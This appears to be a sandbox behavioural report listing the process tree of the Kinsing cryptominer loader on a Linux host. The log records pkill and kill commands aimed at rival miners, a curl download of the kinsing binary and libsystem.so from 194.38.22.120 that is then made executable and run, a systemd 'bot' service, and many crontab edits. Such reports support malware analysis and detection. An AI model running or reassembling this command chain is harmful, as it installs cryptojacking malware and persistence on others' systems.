/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1467
-
-
/usr/bin/idid -u2⤵PID:1468
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1469 -
/usr/sbin/sendmailsendmail -t3⤵PID:1472
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGB3-0000Nk-AW4⤵
- Reads CPU attributes
PID:1485
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1475
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGB3-0000Nn-AV4⤵
- Reads CPU attributes
PID:1486
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1476
-
-
-
/usr/bin/idid -u2⤵PID:1477
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1478
-
-
/bin/unameuname -m2⤵PID:1479
-
-
/bin/grepgrep -e /dev2⤵PID:1482
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/bin/lsls -la /etc/data2⤵PID:1481
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1484
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1487
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1489
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1490
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1491
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1494
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1495
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1496
-
-
/bin/grepgrep :14142⤵PID:1498
-
-
/bin/grepgrep -v -2⤵PID:1501
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1499
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1502
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1504
-
-
/bin/grepgrep -v grep2⤵PID:1505
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1506
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1507
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1503
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1512
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1510
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1508
-
-
/bin/grepgrep stratum2⤵PID:1509
-
-
/bin/grepgrep Sofia2⤵PID:1514
-
-
/bin/grepgrep -v grep2⤵PID:1515
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1513
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1516
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1517
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1518
-
-
/bin/grepgrep tracepath2⤵PID:1520
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1519
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1524
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1527
-
-
/bin/grepgrep /dot2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/grepgrep -v grep2⤵PID:1531
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1532
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1533
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1530
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1529
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1535
-
-
/bin/grepgrep -v grep2⤵PID:1536
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1534
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1537
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1538
-
-
/bin/grepgrep "bash -k"2⤵PID:1540
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1539
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1542
-
-
/bin/grepgrep -v grep2⤵PID:1541
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1543
-
-
/bin/grepgrep -v grep2⤵PID:1546
-
-
/bin/grepgrep perfctl2⤵PID:1545
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1544
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1547
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1548
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1549
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1550
-
-
/bin/grepgrep ./ll12⤵PID:1552
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1551
-
-
/bin/grepgrep -v grep2⤵PID:1553
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1554
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1555
-
-
/bin/grepgrep -v grep2⤵PID:1558
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1556
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1559
-
-
/bin/grepgrep agetty2⤵PID:1557
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1560
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/bin/grepgrep 207.38.87.62⤵PID:1563
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1564
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1565
-
-
/bin/grepgrep -v -2⤵PID:1566
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1567
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1569
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1570
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1571
-
-
/bin/grepgrep -v -2⤵PID:1572
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1573
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1575
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1576
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1577
-
-
/bin/grepgrep -v -2⤵PID:1578
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1579
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1582
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1583
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1581
-
-
/bin/grepgrep -v -2⤵PID:1584
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1585
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1587
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1589
-
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
PID:1588
-
-
/bin/grepgrep -v -2⤵PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1591
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1592
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1593
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1594
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1597
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1598
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1599
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1600
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1601
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1602
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1603
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1604
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1605
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1606
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1607
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1608
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1609
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1610
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1611
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1612
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads runtime system information
PID:1613
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1614
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1615
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1616
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1617
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1618
-
-
/bin/grepgrep ./udp2⤵PID:1620
-
-
/bin/grepgrep -v grep2⤵PID:1621
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1619
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1622
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1623
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1624
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1626
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1625
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1627
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1629
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1628
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1630
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1632
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1631
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1633
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1635
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1634
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1636
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1638
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1637
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1639
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1641
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1640
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1642
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1643
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1644
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1645
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1647
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1646
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1648
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1650
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1649
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/catcat /data/./oka.pid2⤵PID:1652
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1653
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1654
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1655
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1657
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1659
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1658
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1660
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1661
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1662
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1663
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1664
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1665
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1666
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1670
-
-
/bin/grepgrep -v grep2⤵PID:1669
-
-
/bin/grepgrep ./oka2⤵PID:1668
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1671
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1667
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1673
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1672
-
-
/bin/grepgrep -v grep2⤵PID:1674
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1675
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1676
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1678
-
-
/bin/grepgrep -v bin2⤵PID:1679
-
-
/bin/grepgrep -v "\\["2⤵PID:1680
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1677
-
-
/bin/grepgrep -v "("2⤵PID:1681
-
-
/bin/grepgrep -v php-fpm2⤵PID:1682
-
-
/bin/grepgrep -v proxymap2⤵PID:1683
-
-
/bin/grepgrep -v postgres2⤵PID:1684
-
-
/bin/grepgrep -v postgrey2⤵PID:1685
-
-
/bin/grepgrep -v kinsing2⤵PID:1686
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1687
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1688
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1690
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1689
-
-
/bin/grepgrep -v bin2⤵PID:1691
-
-
/bin/grepgrep -v "\\["2⤵PID:1692
-
-
/bin/grepgrep -v "("2⤵PID:1693
-
-
/bin/grepgrep -v php-fpm2⤵PID:1694
-
-
/bin/grepgrep -v proxymap2⤵PID:1695
-
-
/bin/grepgrep -v postgres2⤵PID:1696
-
-
/bin/grepgrep -v postgrey2⤵PID:1697
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1698
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1699
-
-
/bin/grepgrep -v bin2⤵PID:1702
-
-
/bin/psps ax2⤵PID:1700
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1701
-
-
/bin/grepgrep -v "\\["2⤵PID:1703
-
-
/bin/grepgrep -v "("2⤵PID:1704
-
-
/bin/grepgrep -v php-fpm2⤵PID:1705
-
-
/bin/grepgrep -v proxymap2⤵PID:1706
-
-
/bin/grepgrep -v postgres2⤵PID:1707
-
-
/bin/grepgrep -v postgrey2⤵PID:1708
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1710
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1709
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1713
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1714
-
-
/bin/grepgrep -v grep2⤵PID:1712
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1715
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1711
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1719
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1718
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1720
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1721
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1722
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1723
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1727
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1726
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1730
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1731
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1732
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1733
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1734
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1737
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1738
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1739
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1740
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1741
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1744
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1745
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1746
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1747
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1748
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1749
-
-
/usr/bin/idid -u2⤵PID:1751
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1752
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1765
-
-
/bin/sedsed /base64/d2⤵PID:1770
-
-
/usr/bin/crontabcrontab -l2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1771
-
-
/bin/sedsed /_cron/d2⤵PID:1773
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1772
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1775
-
-
/bin/sedsed /update.sh/d2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1778
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1783
-
-
/bin/sedsed /logo4/d2⤵PID:1782
-
-
/usr/bin/crontabcrontab -l2⤵PID:1781
-
-
/bin/sedsed /logo9/d2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1784
-
-
/bin/sedsed /logo0/d2⤵PID:1788
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1787
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1792
-
-
/bin/sedsed /logo/d2⤵PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1795
-
-
/bin/sedsed /tor2web/d2⤵PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1793
-
-
/bin/sedsed /jpg/d2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1796
-
-
/bin/sedsed /png/d2⤵PID:1800
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1799
-
-
/bin/sedsed /tmp/d2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1802
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1805
-
-
/bin/sedsed /aliyun.one/d2⤵
- Reads runtime system information
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1810
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1812
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵PID:1811
-
-
/bin/sedsed /pastebin/d2⤵PID:1815
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1816
-
-
/usr/bin/crontabcrontab -l2⤵PID:1814
-
-
/bin/sedsed /onion/d2⤵PID:1818
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1819
-
-
/usr/bin/crontabcrontab -l2⤵PID:1817
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1821
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1822
-
-
/usr/bin/crontabcrontab -l2⤵PID:1820
-
-
/bin/sedsed /shuf/d2⤵PID:1824
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1825
-
-
/usr/bin/crontabcrontab -l2⤵PID:1823
-
-
/bin/sedsed /ash/d2⤵PID:1830
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1829
-
-
/bin/sedsed /mr.sh/d2⤵PID:1833
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1834
-
-
/usr/bin/crontabcrontab -l2⤵PID:1832
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1837
-
-
/usr/bin/crontabcrontab -l2⤵PID:1835
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1839
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1840
-
-
/usr/bin/crontabcrontab -l2⤵PID:1838
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1842
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1841
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1845
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1846
-
-
/usr/bin/crontabcrontab -l2⤵PID:1844
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1849
-
-
/usr/bin/crontabcrontab -l2⤵PID:1847
-
-
/bin/sedsed /github/d2⤵PID:1848
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1851
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1852
-
-
/usr/bin/crontabcrontab -l2⤵PID:1850
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1855
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1854
-
-
/usr/bin/crontabcrontab -l2⤵PID:1853
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1858
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1857
-
-
/usr/bin/crontabcrontab -l2⤵PID:1856
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1860
-
-
/usr/bin/crontabcrontab -l2⤵PID:1859
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1861
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1863
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1864
-
-
/usr/bin/crontabcrontab -l2⤵PID:1862
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1867
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1866
-
-
/usr/bin/crontabcrontab -l2⤵PID:1865
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1869
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1870
-
-
/usr/bin/crontabcrontab -l2⤵PID:1868
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1873
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1872
-
-
/usr/bin/crontabcrontab -l2⤵PID:1871
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1875
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1876
-
-
/usr/bin/crontabcrontab -l2⤵PID:1874
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1879
-
-
/bin/sedsed /update.sh/d2⤵PID:1878
-
-
/usr/bin/crontabcrontab -l2⤵PID:1877
-
-
